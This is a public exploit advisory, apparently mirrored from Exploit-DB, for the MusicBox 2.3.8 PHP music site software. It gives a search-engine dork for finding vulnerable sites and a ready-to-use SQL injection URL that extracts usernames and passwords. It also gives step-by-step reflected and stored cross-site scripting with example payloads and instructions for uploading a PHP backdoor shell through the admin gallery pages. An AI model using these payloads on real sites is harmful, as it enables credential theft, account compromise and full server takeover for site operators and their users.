MusicBox 2.3.8 – Multiple Vulnerabilities

• Exploit Database
• 98 阅读

• 作者： DevilScreaM
  日期： 2013-08-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/27876/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106

  #Exploit Title : Musicbox 2.3.8 Multiple Vulnerabilities #Author : DevilScreaM #Date : 25/08/2013 #Category : Web Applications #Vendor : http://www.musicboxv2.com/ #Version : 1.0 - 2.3.8   #Dork intext:Musicbox Version intext:Musicbox Version 2.3.8 © 2008 inurl:genre_albums.php?id=   #Vulnerability : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability #Tested On : Windows 7 32 Bit (Mozila & Chrome) #Greetz : Newbie-Security.or.id   SQL Injection Vulnerability   http://site-target/genre_albums.php?id=[SQLI]   Example http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--   ==========================================================================================   Cross site scripting / XSS Vulnerability   *Search   1. Go To Fiture Search   2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search   3. See Result   or See with URL   http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0   Example   http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0     ========================================================================================   *News Profile   1. Register To Website or go to link http://site-target/register.php   2. Login to Website   3. Go to Menu [ My News ]   4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1>   And at Detials input your XSS or Text   See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME]   Example   http://server/musicbox/member.php?uname=devilscream     ==========================================================================================   Shell Upload Vulnerability   *Artist Galery   1. Go to Admin Page, And Login   2. Go to Upload Artist Image or Go to Link   http://site-target/admin/adminpanel.php?action=artistgallery   3. Select Your Shell/Backdoor , And Click Submit   4. Result Upload At   http://site-target/artist_gallery/Your_Backdoor.php     ============================================================================================   *Album Galery   1. Go to Admin Page, And Login   2. Go to Upload Album Image or Go to Link   http://site-target/admin/adminpanel.php?action=albumgallery   3. Select Option, Example Option "All Album", And Click Submit   3. Select Your Shell/Backdoor , And Click Submit   4. Result Upload At   http://site-target/album_gallery/Your_Backdoor.php     ==========================================================================================